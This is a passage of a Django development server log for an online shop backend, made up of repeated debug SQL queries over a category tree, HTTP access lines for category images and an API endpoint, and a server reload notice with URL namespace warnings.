ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:35:29,324 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:35:29,328 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:35:29,332 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:35:29,338 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:35:29,342 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:35:29,347 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:35:29,352 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:35:29,357 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:35:29,361 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:35:29,365 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:35:29,369 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:35:29,374 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:35:29,380 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:35:29,385 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:35:29,390 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:35:29,395 utils 11259 139831299618560 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:35:29,399 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:35:29,403 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:35:29,407 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:35:29,412 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:35:29,417 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:35:29,421 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:35:29,425 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:35:29,429 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:35:29,433 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:35:29,438 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:35:29,442 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:35:29,446 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:35:29,450 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:35:29,454 utils 11259 139831299618560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:35:29] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:30] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:31] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:31] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:31] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:31] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:31] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:31] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:32] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 [13/Dec/2019 13:35:42] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/shopapi/serializers.py changed, reloading. Performing system checks... December 12, 2019 - 06:26:55 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-13 13:37:56,441 utils 19021 139703148009216 (0.013) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-13 13:37:56,449 utils 19021 139703148009216 (0.002) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-13 13:38:04,414 utils 19021 139703114565376 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:38:04,430 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:38:04,435 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:38:04,439 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:38:04,443 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:38:04,447 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:38:04,451 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:38:04,455 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:38:04,459 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:38:04,464 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:38:04,468 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:38:04,471 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:38:04,475 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:38:04,479 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:38:04,484 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:38:04,489 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:38:04,495 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:38:04,499 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:38:04,503 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:38:04,508 utils 19021 139703114565376 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:38:04,511 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:38:04,513 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:38:04,516 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:38:04,518 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:38:04,520 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:38:04,523 utils 19021 139703114565376 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" 